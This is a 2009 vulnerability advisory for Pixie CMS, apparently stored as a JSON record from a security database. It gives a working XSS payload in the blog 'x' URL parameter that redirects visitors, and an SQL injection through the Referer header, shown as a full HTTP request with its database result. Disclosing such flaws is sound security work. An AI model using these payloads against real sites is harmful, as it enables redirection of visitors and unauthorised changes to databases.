{"id": "PACKETSTORM:75901", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Pixie CMS XSS / SQL Injection", "description": "", "published": "2009-03-20T00:00:00", "modified": "2009-03-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/75901/Pixie-CMS-XSS-SQL-Injection.html", "reporter": "Justin C. Klein Keane", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:53", "viewCount": 11, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/75901/pixiecms-sqlxss.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nPixie CMS Multiple Vulnerabilities \n \nPixie is a \"free, open source web application that will help you quickly \ncreate your own website. Many people refer to this type of software as \na 'content management system (cms)'\" (http://www.getpixie.co.uk). Pixie \nis written in PHP with a MySQL database back end. \n \nPixie Blog XSS \n \nIt is possible to trivially introduce a Cross Site Scripting (XSS) \nattack by tampering with blog post URL variables, specifically the \"x=\" \nvariable which is designed to contain blog posting titles. For \ninstance, on a default install of Pixie, the first blog post contains is \nreferenced using the URL ?s=blog&m=permalink&x=my-first-post. The \"x\" \nvariable is interlaced with the BODY tag during display on line 150 of \nindex.php: \n \n<body class=\"pixie <?php $s.\" \"; $date_array = getdate(); print \n\"y\".$date_array['year'].\" \"; print \"m\".$date_array['mon'].\" \"; print \n\"d\".$date_array['mday'].\" \"; print \"h\".$date_array['hours'].\" \"; print \n$s; ?>\"> \n \nby changing the \"x\" variable it is possible to inject HTML code into the \npage display. For instance, a Pixie blog post that was intended to be \npublished as \n \nhttp://192.168.0.67/pixie/?s=blog&m=permalink&x=my-first-post \n \nCan be altered to the form: \n \nhttp://192.168.0.67/pixie/?s=blog&m=permalink&x=\" \nonLoad=\"location.href='http://lampsecurity.org' \n \nand redirect users to the \"onLoad\" specified URL. \n \nPixie Blog SQL Injection \n \nPixie blog is vulnerable to SQL injection by manipulating the \"referer\" \nclient request. Referers are tracked in the referral() function \n(/admin/lib/lib_logs.php line 31) but are not sanitized. Thus, \nmanipulating the referer can allow an attacker to perform SQL Injection \nattacks. For example, sending the request: \n \nGET http://192.168.0.67/pixie/?s=events HTTP/1.1 \nHost: 192.168.0.67 \nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) \nGecko/2009020501 Firefox/3.0.6 Paros/3.2.13 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nKeep-Alive: 300 \nProxy-Connection: keep-alive \nReferer: http://www.lampsecurity.org/pixie/?s=about',log_id=1 on \nduplicate key update log_message='foobar \nCookie: bb2_screener_=1237492959+192.168.0.3 \n \nResults in the pixie_log table being altered by issuing the following \nSQL statement: \n \ninsert into pixie_log set user_id = 'Visitor', user_ip = '192.168.0.3', \nlog_time = now(), log_type = 'referral', log_icon = 'referral', \nlog_message = 'http://www.lampsecurity.org/pixie/?s=about',log_id=1 on \nduplicate key update log_message='foobar' \n \nresulting in: \n \nmysql> select * from pixie_log where log_id=1; \n \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n| log_id | user_id | user_ip | log_time | log_type | \nlog_message | log_icon | log_important | \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n| 1 | Visitor | 192.168.0.3 | 2009-03-19 16:49:31 | system | \nfoobar | error | yes | \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n1 row in set (0.00 sec) \n \nThis vulnerability report is also published at \nhttp://lampsecurity.org/Pixie-CMS-Multiple-Vulnerabilities. \n \n- -- \n \nJustin C. Klein Keane \nhttp://www.MadIrish.net \nhttp://LAMPSecurity.org \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (GNU/Linux) \nComment: Using GnuPG with Mandriva - http://enigmail.mozdev.org \n \niPwEAQECAAYFAknDAV8ACgkQkSlsbLsN1gAFYQcAs7xlN7Ru7oHvEzTgHnthSmFL \nLCVFV6aJUqnZvpZ6pr+45TP/Ae25g24KFnofdTSQF22AYgwYr4ucVdcWplHagdiR \nxvxm1xMf0pSA02Yg8Dch1tXiLuKyJ7qIOjrlcCLyBuVd1iAkMBk9DeGnqn8JAF5b \npfNqhrFbmAn8zKjsOVrCHwD2Y5wZzckMgm9X2CEihoxEIYxNvAbSbUhl/fNhYcUR \nIRk0fv+W6i+DiIgdxj820zkp6+wIzNMH2nxML+81QHiAgLi7jSnOWYx39entiuyf \nQGL8gm3tcVTQI56va34= \n=hOgz \n-----END PGP SIGNATURE----- \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645441432}}